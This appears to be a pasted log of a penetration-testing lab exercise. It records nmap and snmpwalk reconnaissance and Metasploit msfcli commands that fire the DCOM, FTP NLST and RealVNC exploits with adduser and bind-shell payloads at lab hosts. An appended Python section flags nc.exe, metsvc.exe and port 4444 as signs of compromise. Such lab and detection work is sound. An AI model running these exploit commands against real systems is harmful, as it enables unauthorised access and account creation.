Untitled

a guest
Aug 6th, 2010
1. Using nmap to gather information about 192.168.13.201. Obviously this server is getting a shit load of scanning, thus nmap sometimes reports that this server is down.
2. Previously gathered information shows that most Windows servers have port 135 enabled. Checking msfcli reveals the following:
./msfcli |grep windows -i|grep rpc -i
exploit/windows/brightstor/mediasrv_sunrpc CA BrightStor ArcServe Media Service Stack Buffer Overflow
exploit/windows/dcerpc/ms03_026_dcom Microsoft RPC DCOM Interface Overflow
exploit/windows/dcerpc/ms05_017_msmq Microsoft Message Queueing Service Path Overflow
exploit/windows/dcerpc/ms07_065_msmq Microsoft Message Queueing Service DNS Name Path Overflow
exploit/windows/dcerpc/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
exploit/windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
exploit/windows/smb/netidentity_xtierrpcpipe Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
3. Try the 2nd one - DCOM Interface Overflow:
./msfcli exploit/windows/dcerpc/ms03_026_dcom P
./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser O
./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 C
3.a This command responds that server 231 isn't supported.
./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 E
Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
3.b I ignore the failed check and go ahead to try to send the payload. Failed as expected. I do realize that in a real-life situation this would crash the server process, but with the lab servers being revertable I decided to go ahead.
4. Looking at the nmap results for other clues. I picked the 227 server, it seems to have lower versions of software.
5. An snmpwalk feels like the first choice. Results are: 227_ports.log, 227_services.log, 227_software.log and 227_users.log.
6. The "nc.exe" service and port 4444 being listened on reveal that this server might have been compromised.
7. nc -vv 192.168.13.227 4444 returns a "connection refused" error. My guess is that somebody is having a remote shell? I should use other ports if I am getting the shell then.
8. 192.168.12.65 is the guy who is connecting to this port. He also connects to the 1352 port. No luck on nc to that port either.
9. The service metsvc.exe agrees that this is a compromised server running meterpreter.
10. The server name is in its NetBIOS, as SRV2.
11. Let's look at the M$ ESMTP service.
./msfcli |grep -i ESMTP - got nothing.
12. Looking at the ftpd service.
./msfcli exploit/windows/ftp/microsoft_ftpd_nlst PAYLOAD=windows/shell_bind_tcp FTPUSER=ftp FTPPASS=ftp@ftp.com RHOST=192.168.13.227 LPORT=4325 E
13. No luck, 550 GQCYLIOBRL: Access is denied. The root directory of the FTP server is not writeable. I might come back here when I get an account that has file system access.
14. Now try RealVNC. Apparently there is only one exploit and it's client-side for the viewer, thus no luck either.
14b. Well, it appears that MSF2 has something special for RealVNC... realvnc_41_bypass
./msfcli realvnc_41_bypass LHOST=127.0.0.1 RHOST=192.168.13.227 RPORT=5900 E
Why does LHOST have to be 127.0.0.1?? But after the TightVNC viewer shows up, Windows asks for a password to log in again...
15. Found two exploits for port 135:
http://www.metasploit.com/modules/exploit/windows/dcerpc/ms03_026_dcom
The payload can be sent without any responses. The adduser payload failed.
16. Using nmap to banner grab ports from snmpwalk one by one, discovered http://192.168.13.227:6532 web service but only limited to certain IP addresses.
17. Try IIS 5.0 exploits in MSF2 and MSF3, countless fails.
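The defender-side counterpart of steps 5 through 9 above (the nc.exe process, the listener on 4444, the metsvc.exe service and the peer at 192.168.12.65) is a check that scans a process list and a connection table for exactly those indicators. The Python below is an added example and not part of the original paste; its two input listings are constructed to resemble what an snmpwalk of the host would return, and the line formats, function names and the peer's source port are assumptions for this example.

```python
"""Added example: flag the host-compromise indicators named in the log above.

The two sample listings below are constructed to resemble what the author's
snmpwalk pulled (a running-software list and a TCP connection table); they are
not real output from the lab host. The indicator names and ports come from the
log itself (nc.exe, metsvc.exe, port 4444, peer 192.168.12.65); the line
formats, function names and the peer's source port are assumptions.
"""
from dataclasses import dataclass
from typing import Optional

# Indicators the log itself identified: Metasploit's meterpreter service
# binary and a netcat listener.
SUSPICIOUS_PROCESSES = {"metsvc.exe", "nc.exe"}
# 4444 is Metasploit's default handler/bind port; the log found it open.
SUSPICIOUS_PORTS = {4444}

# Constructed sample, one process per line: "<pid> <image name>"
SAMPLE_PROCESSES = """\
4 System
312 svchost.exe
1040 inetinfo.exe
1320 winvnc4.exe
1644 metsvc.exe
1688 nc.exe
"""

# Constructed sample, one socket per line:
# "<proto> <local ip>:<port> <state> [<remote ip>:<port>]"
SAMPLE_CONNECTIONS = """\
tcp 0.0.0.0:21 LISTEN
tcp 0.0.0.0:25 LISTEN
tcp 0.0.0.0:135 LISTEN
tcp 0.0.0.0:4444 LISTEN
tcp 192.168.13.227:4444 ESTABLISHED 192.168.12.65:1087
tcp 0.0.0.0:5900 LISTEN
"""


@dataclass(frozen=True)
class Finding:
    kind: str    # "process" or "socket"
    detail: str  # what was matched
    reason: str  # why it is suspicious


@dataclass(frozen=True)
class Socket:
    proto: str
    laddr: str
    lport: int
    state: str
    raddr: Optional[str]
    rport: Optional[int]


def parse_processes(text: str) -> list[tuple[int, str]]:
    """Return (pid, image name) pairs, skipping malformed lines."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].isdigit():
            procs.append((int(parts[0]), parts[1].strip()))
    return procs


def parse_connections(text: str) -> list[Socket]:
    """Return one Socket per well-formed line; the remote endpoint is optional."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or ":" not in parts[1]:
            continue
        laddr, lport = parts[1].rsplit(":", 1)
        raddr, rport = None, None
        if len(parts) > 3 and ":" in parts[3]:
            raddr, rport_s = parts[3].rsplit(":", 1)
            rport = int(rport_s)
        sockets.append(Socket(parts[0], laddr, int(lport), parts[2], raddr, rport))
    return sockets


def find_indicators(proc_text: str, conn_text: str) -> list[Finding]:
    """Match image names and local ports against the known indicators."""
    findings = []
    for pid, name in parse_processes(proc_text):
        if name.lower() in SUSPICIOUS_PROCESSES:
            findings.append(Finding("process", f"{name} (pid {pid})",
                                    "image name of a known post-exploitation tool"))
    for s in parse_connections(conn_text):
        if s.lport in SUSPICIOUS_PORTS:
            peer = f" from {s.raddr}:{s.rport}" if s.raddr else ""
            findings.append(Finding("socket", f"{s.proto}/{s.lport} {s.state}{peer}",
                                    "local port is a Metasploit default bind/handler port"))
    return findings


def suspicious_peers(conn_text: str) -> set[str]:
    """Remote hosts talking to a suspicious local port: who is holding the shell."""
    return {s.raddr for s in parse_connections(conn_text)
            if s.lport in SUSPICIOUS_PORTS and s.raddr}


if __name__ == "__main__":
    for f in find_indicators(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS):
        print(f"[{f.kind}] {f.detail}: {f.reason}")
    print("peers:", sorted(suspicious_peers(SAMPLE_CONNECTIONS)))
```

Run against the constructed samples it reports both tool processes, the 4444 listener, the established session from 192.168.12.65, and that peer address as the host to investigate next; on a real box the same two listings come from the host's process table and netstat, and the indicator sets are the place to add whatever the environment's own baseline says should never be present.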